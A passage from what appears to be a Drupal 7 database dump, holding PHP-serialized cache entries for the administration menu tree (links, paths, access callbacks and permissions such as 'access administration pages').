pages.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:358;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"358\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:22:\"admin/reports/access/%\";s:11:\"router_path\";s:22:\"admin/reports/access/%\";s:10:\"link_title\";s:7:\"Details\";s:7:\"options\";s:66:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:16:\"View access log.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"358\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:12:\"a:1:{i:3;N;}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"access statistics\";}\";s:13:\"page_callback\";s:21:\"statistics_access_log\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:3;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:22:\"admin/reports/access/%\";s:5:\"title\";s:7:\"Details\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:16:\"View access log.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}}i:21;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"21\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:15:\"admin/structure\";s:11:\"router_path\";s:15:\"admin/structure\";s:10:\"link_title\";s:9:\"Structure\";s:7:\"options\";s:95:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:45:\"Administer blocks, content types, menus, etc.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-8\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:15:\"admin/structure\";s:5:\"title\";s:9:\"Structure\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:45:\"Administer blocks, content types, menus, etc.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:22;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"22\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:11:\"admin/tasks\";s:11:\"router_path\";s:11:\"admin/tasks\";s:10:\"link_title\";s:5:\"Tasks\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-20\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"22\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:5:\"admin\";s:8:\"tab_root\";s:5:\"admin\";s:5:\"title\";s:5:\"Tasks\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"140\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}}}s:10:\"node_links\";a:0:{}}',0,1423659027,1),('links:management:tree-data:en:4cc3398422d20df3c6b4d912febf2bad7c81fb18649882abc3f7245b6c21dc06','a:2:{s:4:\"tree\";a:1:{i:1;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"1\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:5:\"admin\";s:11:\"router_path\";s:5:\"admin\";s:10:\"link_title\";s:14:\"Administration\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"9\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:5:\"admin\";s:5:\"title\";s:14:\"Administration\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:11:{i:7;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"7\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:16:\"admin/appearance\";s:11:\"router_path\";s:16:\"admin/appearance\";s:10:\"link_title\";s:10:\"Appearance\";s:7:\"options\";s:83:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:33:\"Select and configure your themes.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-6\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"7\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"administer themes\";}\";s:13:\"page_callback\";s:18:\"system_themes_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:16:\"admin/appearance\";s:5:\"title\";s:10:\"Appearance\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:33:\"Select and configure your themes.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:8;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"8\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:12:\"admin/config\";s:11:\"router_path\";s:12:\"admin/config\";s:10:\"link_title\";s:13:\"Configuration\";s:7:\"options\";s:70:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:20:\"Administer settings.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"8\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:24:\"system_admin_config_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:12:\"admin/config\";s:5:\"title\";s:13:\"Configuration\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:20:\"Administer settings.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:9;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"9\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:13:\"admin/content\";s:11:\"router_path\";s:13:\"admin/content\";s:10:\"link_title\";s:7:\"Content\";s:7:\"options\";s:82:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:32:\"Administer content and comments.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-10\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"9\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:41:\"a:1:{i:0;s:23:\"access content overview\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:36:\"a:1:{i:0;s:18:\"node_admin_content\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/content\";s:5:\"title\";s:7:\"Content\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:32:\"Administer content and comments.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:11;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"11\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:15:\"admin/dashboard\";s:11:\"router_path\";s:15:\"admin/dashboard\";s:10:\"link_title\";s:9:\"Dashboard\";s:7:\"options\";s:84:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:34:\"View and customize your dashboard.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-15\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"11\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:34:\"a:1:{i:0;s:16:\"access dashboard\";}\";s:13:\"page_callback\";s:15:\"dashboard_admin\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:15:\"admin/dashboard\";s:5:\"title\";s:9:\"Dashboard\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:34:\"View and customize your dashboard.\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:2:{i:33;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"33\";s:4:\"plid\";s:2:\"11\";s:9:\"link_path\";s:25:\"admin/dashboard/configure\";s:11:\"router_path\";s:25:\"admin/dashboard/configure\";s:10:\"link_title\";s:36:\"Configure available dashboard blocks\";s:7:\"options\";s:103:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:53:\"Configure which blocks can be shown on the dashboard.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"11\";s:2:\"p3\";s:2:\"33\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"administer blocks\";}\";s:13:\"page_callback\";s:22:\"dashboard_admin_blocks\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:25:\"admin/dashboard/configure\";s:5:\"title\";s:36:\"Configure available dashboard blocks\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"4\";s:11:\"description\";s:53:\"Configure which blocks can be shown on the dashboard.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:37;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"37\";s:4:\"plid\";s:2:\"11\";s:9:\"link_path\";s:25:\"admin/dashboard/customize\";s:11:\"router_path\";s:25:\"admin/dashboard/customize\";s:10:\"link_title\";s:19:\"Customize dashboard\";s:7:\"options\";s:75:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:25:\"Customize your dashboard.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"11\";s:2:\"p3\";s:2:\"37\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:34:\"a:1:{i:0;s:16:\"access dashboard\";}\";s:13:\"page_callback\";s:15:\"dashboard_admin\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;b:1;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:25:\"admin/dashboard/customize\";s:5:\"title\";s:19:\"Customize dashboard\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"4\";s:11:\"description\";s:25:\"Customize your dashboard.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}}i:12;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"12\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:10:\"admin/help\";s:11:\"router_path\";s:10:\"admin/help\";s:10:\"link_title\";s:4:\"Help\";s:7:\"options\";s:98:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:48:\"Reference for usage, configuration, and modules.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"9\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"12\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:9:\"help_main\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:10:\"admin/help\";s:5:\"title\";s:4:\"Help\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:48:\"Reference for usage, configuration, and modules.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:13;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"13\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:11:\"admin/index\";s:11:\"router_path\";s:11:\"admin/index\";s:10:\"link_title\";s:5:\"Index\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-18\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"13\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:18:\"system_admin_index\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:5:\"admin\";s:8:\"tab_root\";s:5:\"admin\";s:5:\"title\";s:5:\"Index\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:16;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"16\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:13:\"admin/modules\";s:11:\"router_path\";s:13:\"admin/modules\";s:10:\"link_title\";s:7:\"Modules\";s:7:\"options\";s:76:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:26:\"Extend site functionality.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-2\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"16\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:36:\"a:1:{i:0;s:18:\"administer modules\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:32:\"a:1:{i:0;s:14:\"system_modules\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/modules\";s:5:\"title\";s:7:\"Modules\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:26:\"Extend site functionality.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:18;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"18\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:12:\"admin/people\";s:11:\"router_path\";s:12:\"admin/people\";s:10:\"link_title\";s:6:\"People\";s:7:\"options\";s:95:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:45:\"Manage user accounts, roles, and permissions.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-4\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"18\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:34:\"a:1:{i:0;s:16:\"administer users\";}\";s:13:\"page_callback\";s:10:\"user_admin\";s:14:\"page_arguments\";s:21:\"a:1:{i:0;s:4:\"list\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:12:\"admin/people\";s:5:\"title\";s:6:\"People\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:45:\"Manage user accounts, roles, and permissions.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:19;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"19\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:13:\"admin/reports\";s:11:\"router_path\";s:13:\"admin/reports\";s:10:\"link_title\";s:7:\"Reports\";s:7:\"options\";s:84:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:34:\"View reports, updates, and errors.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"5\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/reports\";s:5:\"title\";s:7:\"Reports\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:34:\"View reports, updates, and 